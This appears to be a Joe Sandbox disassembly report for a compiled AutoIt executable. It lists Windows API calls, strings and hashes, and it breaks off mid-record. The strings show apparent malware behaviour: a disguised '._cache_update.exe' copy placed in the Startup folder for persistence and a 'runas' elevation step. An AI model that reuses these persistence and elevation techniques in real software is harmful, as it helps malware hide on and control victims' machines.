• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00252232
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0027DAA4), ref: 00252290
• ShellExecuteW.SHELL32(00000000), ref: 00252297
  • Part of subcall function 001E30A5: GetSysColorBrush.USER32(0000000F), ref: 001E30B0
  • Part of subcall function 001E30A5: LoadCursorW.USER32(00000000,00007F00), ref: 001E30BF
  • Part of subcall function 001E30A5: LoadIconW.USER32(00000063), ref: 001E30D5
  • Part of subcall function 001E30A5: LoadIconW.USER32(000000A4), ref: 001E30E7
  • Part of subcall function 001E30A5: LoadIconW.USER32(000000A2), ref: 001E30F9
  • Part of subcall function 001E30A5: RegisterClassExW.USER32(?), ref: 001E3167
  • Part of subcall function 001E2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2ECB
  • Part of subcall function 001E2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2EEC
  • Part of subcall function 001E2E9D: ShowWindow.USER32(00000000), ref: 001E2F00
  • Part of subcall function 001E2E9D: ShowWindow.USER32(00000000), ref: 001E2F09
  • Part of subcall function 001E3598: _memset.LIBCMT ref: 001E35BE
  • Part of subcall function 001E3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3667
Strings
• This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 002521BE
• runas, xrefs: 0025228B
• "*, xrefs: 001E379D
• C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, xrefs: 001E37B4, 001E37E9, 001E37FD, 00252257
Memory Dump Source
• Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
• Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
Similarity
• API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"*
• API String ID: 4253510256-2116851977
• Opcode ID: 821eb199e023f6f897f05b9856e02bd57f050cabef41732985ea5aefe8008918
• Instruction ID: ae19c2d06f91b0903c5880bacde2bec8b66db9cab4251e765b5a9a0ce1b407c6
• Opcode Fuzzy Hash: 821eb199e023f6f897f05b9856e02bd57f050cabef41732985ea5aefe8008918
• Instruction Fuzzy Hash: CA512670A04684BBCF10ABA2EC4EFAD7B789B17714F044165FA55931D1DFB04A69CF22

Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 001E2A33
                                                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 001E2A5D
                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E2A80
                                                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 001E2A8B
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 001E2A9F
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 001E2AAE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                                                                  • Opcode ID: 080d886463850b40694066ffeafd79c3d38809d0db516aaecf2a95ff437004e2
                                                                                                                                                                  • Instruction ID: e25a6ccc4116bc6a3dd53456a0f96973e5dc3541698d12a1cdeb63e48f259a19
                                                                                                                                                                  • Opcode Fuzzy Hash: 080d886463850b40694066ffeafd79c3d38809d0db516aaecf2a95ff437004e2
                                                                                                                                                                  • Instruction Fuzzy Hash: C4412631224ACAABDB286F66FC1DB7D365EE796310F044136F903934A1DFB48C648765

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00243AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00242AA6,?,?), ref: 00243B0E
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024317F
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0024321E
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002432B6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 658460102-0
                                                                                                                                                                  • Opcode ID: 4b0969e00fda7d9e11062da49282ee9db6894eae652d30df30285a789e5a6da3
                                                                                                                                                                  • Instruction ID: 8fc3d5dacb5361115452612908c66148d1f4f0d1b965b9cbffdb0615c8a0027f
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b0969e00fda7d9e11062da49282ee9db6894eae652d30df30285a789e5a6da3
                                                                                                                                                                  • Instruction Fuzzy Hash: B0E16B71614211AFCB14DF29C895E6EBBE8EF88324F04856DF44ADB2A1DB30ED11CB52
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 001FE4A7
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,0027DC28,?,?), ref: 001FE567
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,0027DC28,?,?), ref: 001FE5BC
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 001FE5C7
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 001FE5DA
                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,0027DC28,?,?), ref: 001FE5E4
                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,0027DC28,?,?), ref: 001FE5F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2717633055-0
                                                                                                                                                                  • Opcode ID: 5b6ae027ec173056e888a3940ceade59d61948696c61c23964b019a53f3d14e2
                                                                                                                                                                  • Instruction ID: 8c044e33356748baf170987d5ee256b885b73723a5d6a8c83bfd48cc3e69316c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b6ae027ec173056e888a3940ceade59d61948696c61c23964b019a53f3d14e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E61C2B59192C8CFCF15CF6898C01E97FA46F2A304F2945D9D8489B267D734C90DCB6A
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001E3202
                                                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 001E3219
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002557D7
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 002557EC
                                                                                                                                                                  • LockResource.KERNEL32(?), ref: 002557FF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                  • String ID: SCRIPT
                                                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                                                  • Opcode ID: 171ec6c8604b14e6ccefa2c92834306a04784d1d77f0fc2f68b487510d8ff2bb
                                                                                                                                                                  • Instruction ID: ae55c243bf4e39a2c53408797f650f453c752788a6fe5d8e32d575bed4d3b26f
                                                                                                                                                                  • Opcode Fuzzy Hash: 171ec6c8604b14e6ccefa2c92834306a04784d1d77f0fc2f68b487510d8ff2bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 93117C74600B46BFE7219B66EC5CF277BB9EBC9B51F208428F95287190DBB1DD008A60
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00226F7D
                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00226F8D
                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00226FAC
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00226FD0
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226FE3
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00227022
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1605983538-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 002278AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 002278CB
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0022F04D
                                                                                                                                                                  • CoCreateInstance.COMBASE(0026DA7C,00000000,00000001,0026D8EC,?), ref: 0022F066
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0022F083
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(001EC848,001EC848), ref: 001FDDA2
                                                                                                                                                                  • FindFirstFileW.KERNEL32(001EC848,?), ref: 00254A83
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesFindFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4185537391-0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE279
                                                                                                                                                                  • timeGetTime.WINMM ref: 001EE51A
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 001EE646
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 001EE651
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE664
                                                                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 001EE697
                                                                                                                                                                  • DestroyWindow.USER32 ref: 001EE6A3
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001EE6BD
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00255B15
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 002562AF
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 002562BD
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002562D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                                                                  • Opcode ID: 871afc2a51a55337d0af1aa9072b41822786993a4d5ab3bd575af5b8c8cf774b
                                                                                                                                                                  • Instruction ID: bd0622e4c34d6d79503791667f4fc959eff8ad093f0c1e1083143011f3cb096a
                                                                                                                                                                  • Opcode Fuzzy Hash: 871afc2a51a55337d0af1aa9072b41822786993a4d5ab3bd575af5b8c8cf774b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A621370508785DFEB24DF24D899BAE77E4BF45304F04486DF94A8B2A2DBB1D848CB52
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___createFile.LIBCMT ref: 00216C73
                                                                                                                                                                  • ___createFile.LIBCMT ref: 00216CB4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00216CDD
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00216CE4
                                                                                                                                                                  • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00216CF7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00216D1A
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00216D23
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00216D2C
                                                                                                                                                                  • __set_osfhnd.LIBCMT ref: 00216D5C
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216DC6
                                                                                                                                                                  • __close_nolock.LIBCMT ref: 00216DEC
                                                                                                                                                                  • __chsize_nolock.LIBCMT ref: 00216E1C
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216E2E
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216F26
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216F3B
                                                                                                                                                                  • __close_nolock.LIBCMT ref: 00216F9B
                                                                                                                                                                    • Part of subcall function 0020F84C: CloseHandle.KERNEL32(00000000,0028EEC4,00000000,?,00216DF1,0028EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0020F89C
                                                                                                                                                                    • Part of subcall function 0020F84C: GetLastError.KERNEL32(?,00216DF1,0028EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0020F8A6
                                                                                                                                                                    • Part of subcall function 0020F84C: __free_osfhnd.LIBCMT ref: 0020F8B3
                                                                                                                                                                    • Part of subcall function 0020F84C: __dosmaperr.LIBCMT ref: 0020F8D5
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216FBD
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002170F2
                                                                                                                                                                  • ___createFile.LIBCMT ref: 00217111
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0021711E
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00217125
                                                                                                                                                                  • __free_osfhnd.LIBCMT ref: 00217145
                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00217173
                                                                                                                                                                  • __wsopen_helper.LIBCMT ref: 0021718D
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                  • String ID: 9A $@
                                                                                                                                                                  • API String ID: 3896587723-4139971684
                                                                                                                                                                  • Opcode ID: 9d9548e415c8ee75e797d017b46a2b275429d3d3a1cc2751421babb5cc6c07ee
                                                                                                                                                                  • Instruction ID: 266edfc127d862ed63f0873a5df234ff9bc992ba5703fcbbac0dd0ec4be70186
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d9548e415c8ee75e797d017b46a2b275429d3d3a1cc2751421babb5cc6c07ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C2248719242069BEB248F68DC59BEE7BB1EF24324F244229E551A72D2C7758DF0CB90

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 002276ED
                                                                                                                                                                  • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00227713
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00227741
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022774C
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00227762
                                                                                                                                                                  • _wcsstr.LIBCMT ref: 0022776D
                                                                                                                                                                  • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00227789
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002277D2
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002277D9
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00227804
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 716990576-1459072770
                                                                                                                                                                  • Opcode ID: 44290c6e33c5fdf34c24dd7e6ba9781aef6e702f5e92a08f0fdc8d4225915166
                                                                                                                                                                  • Instruction ID: e6e865cf1176600f259357a8873bea7eec0574eca9df73b4eacdd8db28afaf85
                                                                                                                                                                  • Opcode Fuzzy Hash: 44290c6e33c5fdf34c24dd7e6ba9781aef6e702f5e92a08f0fdc8d4225915166
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D410B71924314BAE701A7A49C8BEBFB7BCDF55710F00405AF404A61D3EBB49A31DAA1

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 001E1FBE
                                                                                                                                                                  • IsWindow.USER32(?), ref: 0025282E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                                                                  • Opcode ID: c7ed377c35c5fd9fde6f734e92838e9e97787994ff75efa0ad87ca546360899a
                                                                                                                                                                  • Instruction ID: af6ef6e0ebf6c0f46ea2cca4160ca690d0e3037ea5262bf62bb3bc75ffb252ef
                                                                                                                                                                  • Opcode Fuzzy Hash: c7ed377c35c5fd9fde6f734e92838e9e97787994ff75efa0ad87ca546360899a
                                                                                                                                                                  • Instruction Fuzzy Hash: 03D13930114643EBCB08EF51C894AADB7A5BF25344F144A2DF855571E2CB70E9BECBA2

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001FEA39
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 001FEA56
                                                                                                                                                                    • Part of subcall function 0020297D: __wsplitpath_helper.LIBCMT ref: 002029BD
                                                                                                                                                                  • _wcsncat.LIBCMT ref: 001FEA69
                                                                                                                                                                  • __makepath.LIBCMT ref: 001FEA85
                                                                                                                                                                    • Part of subcall function 00202BFF: __wmakepath_s.LIBCMT ref: 00202C13
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 001FEABE
                                                                                                                                                                    • Part of subcall function 001FEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,001FEADA,?,?), ref: 001FEB27
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002532FC
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00253334
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00253370
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                                  • String ID: '/"$Include$\$"*
                                                                                                                                                                  • API String ID: 1213536620-1532446309
                                                                                                                                                                  • Opcode ID: 2d0b2f160460cfb2c8ae6b89adb7412837d4a457e084768d0ac5e923490f3c4b
                                                                                                                                                                  • Instruction ID: 58371af6bd90aa29ea397f02302a8b64a6ad7cc8d6142ffb082418ff52952532
